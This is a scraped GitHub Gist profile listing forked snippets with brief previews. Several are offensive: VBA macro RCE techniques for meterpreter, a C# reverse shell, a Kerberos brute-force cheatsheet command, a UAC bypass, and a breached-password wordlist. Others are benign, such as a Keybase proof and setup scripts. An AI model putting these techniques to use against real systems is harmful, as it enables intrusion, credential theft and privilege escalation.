Skip to content

Instantly share code, notes, and snippets.

View IraqNoPhobia's full-sized avatar

IraqNoPhobia IraqNoPhobia

30 followers · 25 following
View GitHub Profile
@IraqNoPhobia
IraqNoPhobia / Various-Macro-Based-RCEs.md
Created September 18, 2019 22:38 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
@IraqNoPhobia
IraqNoPhobia / Simple_Rev_Shell.cs
Created September 17, 2019 22:51 — forked from BankSecurity/Simple_Rev_Shell.cs
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
@IraqNoPhobia
IraqNoPhobia / kerberos_attacks_cheatsheet.md
Created August 28, 2019 22:06 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@IraqNoPhobia
IraqNoPhobia / powershell-uac-always-notify-bypass.ps1
Created April 28, 2019 22:13 — forked from chryzsh/powershell-uac-always-notify-bypass.ps1
uac bypass for always notify (works on 1903)
$assemblies=(
"System"
)
$source=@"
using System;
using Microsoft.Win32;
using System.Diagnostics;
namespace Helloworld
@IraqNoPhobia
IraqNoPhobia / breachcompilation.txt
Created March 22, 2019 20:08
1.4 billion password breach compilation wordlist
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
@IraqNoPhobia
IraqNoPhobia / keybase_iraq
Created January 26, 2019 15:53
### Keybase proof
I hereby claim:
* I am iraqnophobia on github.
* I am iraqnophobia (https://keybase.io/iraqnophobia) on keybase.
* I have a public key ASB-29x0WuIjyZKiP-PRaTKWiWC7V0iMZUVgkXRnklbahQo
To claim this, I am signing this object:
@IraqNoPhobia
IraqNoPhobia / reclaimWindows10.ps1
Created January 22, 2019 22:22 — forked from alirobe/reclaimWindows10.ps1
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetery, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of https://github.com/Disassembler0/Win10-Initial-Setup-Script (different defaults). N.…
##########
# Tweaked Win10 Initial Setup Script
# Primary Author: Disassembler <disassembler@dasm.cz>
# Modified by: alirobe <alirobe@alirobe.com> based on my personal preferences.
# Version: 2.20.2, 2018-09-14
# Primary Author Source: https://github.com/Disassembler0/Win10-Initial-Setup-Script
# Tweaked Source: https://gist.github.com/alirobe/7f3b34ad89a159e6daa1/
# Tweak difference:
#
# @alirobe's version is a subset focused on safely disabling telemetry, some 'smart' features and 3rd party bloat ...
@IraqNoPhobia
IraqNoPhobia / install-kismet-kali.sh
Created January 22, 2019 12:39 — forked from r4ndom-handle/install-kismet-kali.sh
Kali Linux - remove packaged Kismet, download and install newest Kismet with RTL_AMR, RTL_433, and RTL_ADSB PHY support
#!/bin/bash
#Hacked together by: Nick Delewski / @r4ndom_handle / r@ndom.email
#Date: 28 December 2018
#Installs the newest kismet with all currently enabled RTLSDR goodness on a fresh Kali build.
cd /opt
apt -y remove kismet
#install rtl_433
git clone https://github.com/merbanan/rtl_433.git
@IraqNoPhobia
IraqNoPhobia / Auto Check-In to Southwest Flights.user.js
Created December 25, 2018 17:28 — forked from stormchasing/Auto Check-In to Southwest Flights.user.js
Auto Check-In to Southwest Flights.user.js
// ==UserScript==
// @name Auto Check-In to Southwest Flights
// @namespace http://www.ryanizzo.com/southwest-auto-check-in/
// @version 1.7
// @author Nicholas Buroojy (http://userscripts.org/users/83813)
// @contributor Ryan Izzo (http://www.ryanizzo.com)
// @contributor JR Hehnly (http://www.okstorms.com @stormchasing)
// @contributor Trevor McClellan (github.com/trevormcclellan)
// @description Automatically check in to Southwest Airline flights at the appropriate time.
// @include https://www.southwest.com/air/check-in/index.html*
@IraqNoPhobia
IraqNoPhobia / ADrecon.ps1
Created July 20, 2018 15:25
adrecon
<#
.SYNOPSIS
ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.
.DESCRIPTION
ADRecon is a tool which extracts various artifacts (as highlighted below) out of an AD environment in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis.
The report can provide a holistic picture of the current state of the target AD environment.